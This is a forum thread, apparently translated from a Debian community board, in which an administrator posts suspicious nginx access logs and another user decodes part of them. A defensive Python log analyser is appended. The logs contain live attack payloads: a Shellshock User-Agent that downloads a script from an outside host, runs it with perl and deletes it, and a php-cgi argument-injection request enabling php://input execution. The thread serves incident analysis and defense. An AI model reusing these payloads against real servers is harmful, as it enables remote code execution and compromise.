ZeroDay and something else odd in the NGINX logs

Debian makes an excellent web and mail server. Also have a look at the "Tips and Tricks" section.
steintasse
Posts: 31
Registered: 26.11.2013 18:42:38

ZeroDay and something else odd in the NGINX logs

Post by steintasse » 19.08.2016 16:33:11

Hello, nginx is spitting out worrying things in my logs. First, about my system: I am running Debian 7, nginx 1.2.1 and PHP 5.6.24-1~dotdeb+7.1 (fpm-fcgi) (built: Jul 21 2016 23:28:37).
So the zero-day should not be able to hurt me. Unfortunately there are still some entries in the log files that I cannot make sense of. I simply don't know what encoding these apparent commands were encoded in 8O From 180.97.106.37, for example. Nginx manages four virtual web servers for me, and three of them saw quite a lot of action over the last two days. To be safe I shut my vServer down.

/var/log/nginx_access.log


89.237.75.243 - - [18/Aug/2016:05:08:39 +0200] "GET / HTTP/1.0" 301 178 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
180.97.106.37 - - [18/Aug/2016:05:40:06 +0200] "GET hxxp://180.163.113.82/check_proxy HTTP/1.1" 301 178 "-" "-"
157.55.39.223 - - [18/Aug/2016:05:44:10 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
123.52.44.254 - - [18/Aug/2016:06:02:22 +0200] "OPTIONS /ipc$ HTTP/1.1" 301 178 "-" "Microsoft-WebDAV-MiniRedir/6.1.7601"
136.243.48.85 - - [18/Aug/2016:06:04:16 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36"
66.249.69.61 - - [18/Aug/2016:06:20:15 +0200] "GET /robots.txt HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
66.249.69.61 - - [18/Aug/2016:06:20:16 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
66.249.76.88 - - [18/Aug/2016:06:20:17 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
46.119.117.90 - - [18/Aug/2016:06:31:39 +0200] "GET / HTTP/1.1" 301 178 "hxxp://eupornstar.info/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
46.119.117.90 - - [18/Aug/2016:06:31:39 +0200] "GET / HTTP/1.1" 301 178 "hxxp://eupornstar.info/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
134.249.65.218 - - [18/Aug/2016:06:35:53 +0200] "GET / HTTP/1.1" 301 178 "hxxp://education-cz.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
134.249.65.218 - - [18/Aug/2016:06:35:54 +0200] "GET / HTTP/1.1" 301 178 "hxxp://education-cz.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
134.249.65.218 - - [18/Aug/2016:06:35:55 +0200] "GET / HTTP/1.1" 301 178 "hxxp://education-cz.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
91.196.50.33 - - [18/Aug/2016:07:06:13 +0200] "GET hxxp://testp1.piwo.pila.pl/testproxy.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0"
180.76.15.150 - - [18/Aug/2016:07:46:22 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +hxxp://www.baidu.com/search/spider.html)"
157.55.39.223 - - [18/Aug/2016:08:33:29 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
199.166.28.30 - - [18/Aug/2016:10:13:19 +0200] "GET / HTTP/1.1" 301 178 "-" "=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16"
93.125.99.50 - - [18/Aug/2016:10:28:10 +0200] "GET /js/mage/cookies.js HTTP/1.1" 301 178 "best-bc.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4"
212.83.162.138 - - [18/Aug/2016:10:29:41 +0200] "HEAD /robots.txt HTTP/1.0" 301 0 "-" "-"
180.141.91.205 - - [18/Aug/2016:11:07:03 +0200] "OPTIONS /ipc$ HTTP/1.1" 301 178 "-" "Microsoft-WebDAV-MiniRedir/6.1.7601"
111.253.147.86 - - [18/Aug/2016:11:07:10 +0200] "OPTIONS /ipc$ HTTP/1.1" 301 178 "-" "Microsoft-WebDAV-MiniRedir/6.1.7601"
176.94.194.90 - - [18/Aug/2016:11:15:16 +0200] "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69 %6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%6 4%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
136.243.48.85 - - [18/Aug/2016:11:32:39 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36"
192.99.144.140 - - [18/Aug/2016:11:46:04 +0200] "PROPFIND /webdav/ HTTP/1.1" 301 178 "-" "WEBDAV Client"
169.229.3.91 - - [18/Aug/2016:12:03:45 +0200] "\xFA\xD2\x1Ba\x05-\xE4\x9E\xA57\xC2\xF4x\x8AK\xCB\xA8`6\xEA\xD7\xFCl-|\xD6\x15\x86\xC7\xE2I@\xC8y\xF8\xB57\xEFe\xF2\x19\x8A\xA8\x17/\xC85\xB2\x91}\xC9Y\x8EB^\xA3\x9A\x07\xA9\x80N=\x95&" 400 166 "-" "-"
180.76.15.152 - - [18/Aug/2016:12:26:32 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +hxxp://www.baidu.com/search/spider.html)"
46.118.159.110 - - [18/Aug/2016:12:41:00 +0200] "GET / HTTP/1.1" 301 178 "hxxp://tver.xrus.org/" "Mozilla/4.0 (compatible; MSIE 4.01; Digital AlphaServer 1000A 4/233; Windows NT; Powered By 64-Bit Alpha Processor)"
46.118.159.110 - - [18/Aug/2016:12:41:01 +0200] "GET / HTTP/1.1" 301 178 "hxxp://tver.xrus.org/" "Mozilla/4.0 (compatible; MSIE 4.01; Digital AlphaServer 1000A 4/233; Windows NT; Powered By 64-Bit Alpha Processor)"
180.97.106.37 - - [18/Aug/2016:12:58:45 +0200] "\x04\x01\x00P\xB4\xA3qR\x00" 400 166 "-" "-"
114.39.108.80 - - [18/Aug/2016:13:01:39 +0200] "OPTIONS /ipc$ HTTP/1.1" 301 178 "-" "Microsoft-WebDAV-MiniRedir/6.1.7601"
66.249.76.88 - - [18/Aug/2016:13:10:25 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
157.55.39.205 - - [18/Aug/2016:13:55:50 +0200] "GET /impressum.html HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
46.119.117.90 - - [18/Aug/2016:15:23:25 +0200] "GET / HTTP/1.1" 301 178 "hxxp://confib.ifmo.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
46.119.117.90 - - [18/Aug/2016:15:23:25 +0200] "GET / HTTP/1.1" 301 178 "hxxp://interesnie-faktu.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
46.119.117.90 - - [18/Aug/2016:15:23:25 +0200] "GET / HTTP/1.1" 301 178 "hxxp://confib.ifmo.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
46.119.117.90 - - [18/Aug/2016:15:23:25 +0200] "GET / HTTP/1.1" 301 178 "hxxp://interesnie-faktu.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
46.119.117.90 - - [18/Aug/2016:15:23:25 +0200] "GET / HTTP/1.1" 301 178 "hxxp://confib.ifmo.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
46.119.117.90 - - [18/Aug/2016:15:23:25 +0200] "GET / HTTP/1.1" 301 178 "hxxp://interesnie-faktu.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
180.97.106.37 - - [18/Aug/2016:15:34:15 +0200] "\x05\x02\x00\x02" 400 166 "-" "-"
138.201.30.66 - - [18/Aug/2016:15:43:52 +0200] "GET /robots.txt HTTP/1.0" 301 178 "-" "Mozilla/5.0 (compatible; SEOkicks-Robot; +hxxp://www.seokicks.de/robot.html)"
138.201.30.66 - - [18/Aug/2016:15:43:54 +0200] "GET / HTTP/1.0" 301 178 "-" "Mozilla/5.0 (compatible; SEOkicks-Robot; +hxxp://www.seokicks.de/robot.html)"
45.79.111.169 - - [18/Aug/2016:15:44:04 +0200] "GET / HTTP/1.1" 301 178 "hxxp://uptime.com/bestbc.de" "Mozilla/5.0 (compatible; Uptimebot/0.2.35; +hxxp://www.uptime.com/uptimebot)"
95.128.43.164 - - [18/Aug/2016:16:03:58 +0200] "GET / HTTP/1.1" 301 178 "hxxp://burger-imperia.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36"
91.196.50.33 - - [18/Aug/2016:16:07:51 +0200] "GET hxxp://testp4.pospr.waw.pl/testproxy.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0"
66.249.76.88 - - [18/Aug/2016:16:11:57 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
157.55.39.223 - - [18/Aug/2016:16:19:39 +0200] "GET /projekte/aktuell/sellnews HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
157.55.39.223 - - [18/Aug/2016:16:19:39 +0200] "GET /projects.htm HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
157.55.39.16 - - [18/Aug/2016:16:19:44 +0200] "GET /index.php?lang=de HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
157.55.39.205 - - [18/Aug/2016:16:19:48 +0200] "GET /weihnachten HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
157.55.39.205 - - [18/Aug/2016:16:19:48 +0200] "GET /projekt-scouts.html HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
188.138.41.209 - - [19/Aug/2016:05:31:19 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; hxxp://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
188.138.41.209 - - [19/Aug/2016:05:32:09 +0200] "GET /robots.txt HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; hxxp://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
188.138.41.209 - - [19/Aug/2016:05:32:11 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; hxxp://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
188.138.41.209 - - [19/Aug/2016:05:32:19 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; hxxp://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
188.138.41.209 - - [19/Aug/2016:05:32:19 +0200] "GET /favicon.ico HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; hxxp://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
188.138.41.209 - - [19/Aug/2016:05:32:21 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; hxxp://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
157.55.39.223 - - [19/Aug/2016:05:39:11 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
104.128.144.131 - - [19/Aug/2016:08:35:45 +0200] "GET / HTTP/1.0" 301 178 "-" "www.probethenet.com scanner"
104.128.144.131 - - [19/Aug/2016:08:35:45 +0200] "HEAD /redirect.php HTTP/1.0" 301 0 "-" "www.probethenet.com scanner"
134.249.51.75 - - [19/Aug/2016:10:00:44 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
185.25.151.159 - - [19/Aug/2016:10:25:35 +0200] "GET hxxp://testp1.piwo.pila.pl/testproxy.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0"
192.99.144.140 - - [19/Aug/2016:10:31:29 +0200] "PROPFIND /webdav/ HTTP/1.1" 301 178 "-" "WEBDAV Client"
139.162.13.205 - - [19/Aug/2016:11:31:44 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
192.99.238.190 - - [19/Aug/2016:12:04:18 +0200] "GET /w00tw00t.at.ISC.SANS.DFind HTTP/1.1" 400 166 "-" "-"
192.99.238.190 - - [19/Aug/2016:12:05:48 +0200] "GET /w00tw00t.at.ISC.SANS.DFind HTTP/1.1" 400 166 "-" "-"

access_log /var/log/nginx/nginx_git_access.log;
This web server basically only served two Git repositories that could be cloned.


71.6.135.131 - - [18/Aug/2016:09:21:00 +0200] "GET / HTTP/1.1" 404 564 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36"
71.6.135.131 - - [18/Aug/2016:09:21:01 +0200] "-" 400 0 "-" "-"
71.6.135.131 - - [18/Aug/2016:09:21:02 +0200] "-" 400 0 "-" "-"
71.6.135.131 - - [18/Aug/2016:09:21:02 +0200] "-" 400 0 "-" "-"
71.6.135.131 - - [18/Aug/2016:09:21:02 +0200] "-" 400 0 "-" "-"
71.6.135.131 - - [18/Aug/2016:09:21:03 +0200] "" 400 0 "-" "-"
71.6.135.131 - - [18/Aug/2016:09:21:03 +0200] "" 400 0 "-" "-"
71.6.135.131 - - [18/Aug/2016:09:21:04 +0200] "-" 400 0 "-" "-"
71.6.135.131 - - [18/Aug/2016:09:21:04 +0200] "" 400 0 "-" "-"
71.6.135.131 - - [18/Aug/2016:09:21:04 +0200] "-" 400 0 "-" "-"
71.6.135.131 - - [18/Aug/2016:09:21:05 +0200] "-" 400 0 "-" "-"
71.6.135.131 - - [18/Aug/2016:09:21:08 +0200] "quit" 400 166 "-" "-"
71.6.135.131 - - [18/Aug/2016:09:21:10 +0200] "" 400 0 "-" "-"
71.6.135.131 - - [18/Aug/2016:09:21:11 +0200] "-" 400 0 "-" "-"
220.202.123.178 - - [18/Aug/2016:12:31:21 +0200] "GET / HTTP/1.1" 404 162 "-" "Python-urllib/2.6"
220.202.123.178 - - [18/Aug/2016:12:31:24 +0200] "-" 400 0 "-" "-"
220.202.123.178 - - [18/Aug/2016:12:31:32 +0200] "GET / HTTP/1.1" 400 264 "-" "Python-urllib/2.6"
220.202.123.178 - - [18/Aug/2016:12:31:33 +0200] "GET / HTTP/1.1" 400 264 "-" "() { :;}; /bin/bash -c \x22wget -qO - hxxp://pinkiceberg.com/.mail | perl ; cd /tmp ; curl -O hxxp://pinkiceberg.com/.mail ; fetch hxxp://pinkiceberg.com/.mail ; perl .mail ;rm -rf .mail* \x22"
That one looks particularly ugly.

/etc/nginx/include# cat /var/log/nginx/nginx_devi_access.log


148.243.30.82 - - [18/Aug/2016:05:19:13 +0200] "-" 400 0 "-" "-"
148.243.30.82 - - [18/Aug/2016:05:19:14 +0200] "\x00\x00\x00\x85\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE\x00\x00\x00\x00\x00b\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00" 400 166 "-" "-"
123.52.44.254 - - [18/Aug/2016:06:02:20 +0200] "-" 400 0 "-" "-"
123.52.44.254 - - [18/Aug/2016:06:02:21 +0200] "\x00\x00\x00\x9B\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFE\x00\x00\x00\x00\x00x\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" 400 166 "-" "-"
120.192.167.26 - - [18/Aug/2016:07:07:13 +0200] "-" 400 0 "-" "-"
120.192.167.26 - - [18/Aug/2016:07:07:19 +0200] "\x00\x00\x00\x85\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE\x00\x00\x00\x00\x00b\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00" 400 166 "-" "-"
115.236.28.130 - - [18/Aug/2016:08:02:07 +0200] "\x00\x00\x00\x85\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE\x00\x00\x00\x00\x00b\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00" 400 166 "-" "-"
114.215.198.162 - - [18/Aug/2016:08:53:59 +0200] "-" 400 0 "-" "-"
118.233.141.190 - - [18/Aug/2016:09:06:00 +0200] "-" 400 0 "-" "-"
118.233.141.190 - - [18/Aug/2016:09:06:00 +0200] "\x00\x00\x00\x9B\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFE\x00\x00\x00\x00\x00x\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" 400 166 "-" "-"
114.39.11.207 - - [18/Aug/2016:10:18:46 +0200] "-" 400 0 "-" "-"
74.208.227.50 - - [18/Aug/2016:10:35:29 +0200] "-" 400 0 "-" "-"
74.208.227.50 - - [18/Aug/2016:10:35:30 +0200] "\x00\x00\x00\x9B\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFE\x00\x00\x00\x00\x00x\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" 400 166 "-" "-"
180.141.91.205 - - [18/Aug/2016:11:07:01 +0200] "-" 400 0 "-" "-"
180.141.91.205 - - [18/Aug/2016:11:07:02 +0200] "\x00\x00\x00\x9B\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFE\x00\x00\x00\x00\x00x\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" 400 166 "-" "-"
111.253.147.86 - - [18/Aug/2016:11:07:06 +0200] "-" 400 0 "-" "-"
111.253.147.86 - - [18/Aug/2016:11:07:07 +0200] "\x00\x00\x00\x9B\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFE\x00\x00\x00\x00\x00x\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" 400 166 "-" "-"
114.39.108.80 - - [18/Aug/2016:13:01:38 +0200] "-" 400 0 "-" "-"
114.39.108.80 - - [18/Aug/2016:13:01:39 +0200] "\x00\x00\x00\x9B\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFE\x00\x00\x00\x00\x00x\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" 400 166 "-" "-" 


EDIT 2: So the entries in access_log /var/log/nginx/nginx_git_access.log are apparently Shellshock, but I did not get any further than that :/. Luckily, or naturally, as you can see, I also seem to be safe against Shellshock :)
Last edited by TRex on 19.08.2016 20:01:36, edited 1 time in total.
Reason: s/quote/code/g

rendegast
Posts: 15041
Registered: 27.02.2006 16:50:33
Licence for own posts: MIT licence

Re: ZeroDay and something else odd in the NGINX logs

Post by rendegast » 27.08.2016 02:40:35

176.94.194.90 - - [18/Aug/2016:11:15:16 +0200] "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69 %6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%6 4%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
via http://www.andre-jochim.de/url-encode.htm gives


/phppath/php?-d allow_url_include=on -d safe_mode=off -d suhosi n.simulation=on -d disable_functions="" -d open_base%6 4ir=none -d auto_prepend_file=php://input -n
169.229.3.91 - - [18/Aug/2016:12:03:45 +0200] "\xFA\xD2\x1Ba\x05-\xE4\x9E\xA57\xC2\xF4x\x8AK\xCB\xA8`6\xEA\xD7\xFCl-|\xD6\x15\x86\xC7\xE2I@\xC8y\xF8\xB57\xEFe\xF2\x19\x8A\xA8\x17/\xC85\xB2\x91}\xC9Y\x8EB^\xA3\x9A\x07\xA9\x80N=\x95&" 400 166 "-" "-"
On http://ddecode.com/hexdecoder/ nothing, though.
regards rendegast
-----------------------
Much zeal, much error; less zeal, less error; no zeal, no error.
(Lin Yutang, "Moment in Peking")
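As an added example (not from the thread or from any of its posters), a small Python analyser for the kind of lines quoted above: it parses nginx's combined log format, URL-decodes request paths the way rendegast did by hand, and unescapes nginx's \xNN byte notation so the binary requests steintasse could not identify can be matched against the protocol they actually belong to. The sample lines are constructed after the thread's logs; example.invalid and the addresses 198.51.100.7 and 203.0.113.9 are placeholders.

```python
import re
from urllib.parse import unquote_plus

# nginx "combined" format: ip - user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(.*?)" (\d{3}) (\d+) "(.*?)" "(.*)"$')

# Constructed sample lines modelled on the thread's logs; example.invalid, 198.51.100.7 and
# 203.0.113.9 are placeholders, not values from the thread.
SAMPLE_LINES = r'''180.97.106.37 - - [18/Aug/2016:12:58:45 +0200] "\x04\x01\x00P\xB4\xA3qR\x00" 400 166 "-" "-"
180.97.106.37 - - [18/Aug/2016:15:34:15 +0200] "\x05\x02\x00\x02" 400 166 "-" "-"
148.243.30.82 - - [18/Aug/2016:05:19:14 +0200] "\x00\x00\x00\x85\xFFSMBr\x00\x00" 400 166 "-" "-"
176.94.194.90 - - [18/Aug/2016:11:15:16 +0200] "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E HTTP/1.1" 301 178 "-" "Mozilla/5.0"
220.202.123.178 - - [18/Aug/2016:12:31:33 +0200] "GET / HTTP/1.1" 400 264 "-" "() { :;}; /bin/bash -c \x22wget -qO - http://example.invalid/x | perl\x22"
203.0.113.9 - - [18/Aug/2016:05:40:06 +0200] "GET http://198.51.100.7/check_proxy HTTP/1.1" 301 178 "-" "-"
71.6.135.131 - - [18/Aug/2016:09:21:02 +0200] "-" 400 0 "-" "-"'''.splitlines()

def nginx_unescape(field: str) -> bytes:
    """Undo nginx's \\xNN escaping so the raw bytes the client sent can be inspected."""
    return re.sub(r'\\x([0-9A-Fa-f]{2})',
                  lambda m: chr(int(m.group(1), 16)), field).encode('latin-1')

def classify_raw(raw: bytes) -> str:
    """Name the non-HTTP protocols scanners speak to port 80 (nginx answers 400)."""
    if len(raw) >= 9 and raw[0] == 4 and raw[1] == 1:             # SOCKS4: VN=4 CD=1 port ip
        ip = '.'.join(str(b) for b in raw[4:8])
        return f'SOCKS4 CONNECT to {ip}:{int.from_bytes(raw[2:4], "big")} (open-proxy probe)'
    if len(raw) >= 2 and raw[0] == 5 and len(raw) == 2 + raw[1]:  # SOCKS5: VER=5 NMETHODS methods
        return 'SOCKS5 greeting (open-proxy probe)'
    if len(raw) > 8 and raw[4:8] == b'\xffSMB':                   # NetBIOS length + SMB1 header
        return 'SMB1 Negotiate Protocol (port-445 scanner)' if raw[8] == 0x72 else 'SMB1 packet'
    return 'unknown binary request'

def classify_http(method: str, path: str, ua: str) -> str:
    """Spot the probe patterns from the thread in a decoded HTTP request line."""
    decoded = unquote_plus(path)               # turns /%70%68%70... back into /php...
    if '() {' in ua:
        return 'Shellshock payload in User-Agent'
    if re.search(r'\?-d\s', decoded):
        return f'php-cgi argument injection attempt: {decoded}'
    if re.match(r'https?://', path):
        return 'absolute-URL request (open-proxy check)'
    if method == 'OPTIONS' and path.lower().endswith('/ipc$'):
        return 'WebDAV redirector probing an SMB share name'
    return 'ordinary request'

def analyse(line: str) -> dict:
    """Parse one access-log line and attach a verdict."""
    m = LOG_RE.match(line)
    if not m:
        return {'error': 'unparseable', 'line': line}
    ip, ts, req, status, size, ref, ua = m.groups()
    parts = req.split(' ')
    if len(parts) == 3 and parts[2].startswith('HTTP/'):
        verdict = classify_http(parts[0], parts[1], ua)
    elif req in ('', '-'):
        verdict = 'empty request (connection opened, nothing sent)'
    else:
        verdict = classify_raw(nginx_unescape(req))
    return {'ip': ip, 'time': ts, 'status': int(status), 'request': req, 'verdict': verdict}
```

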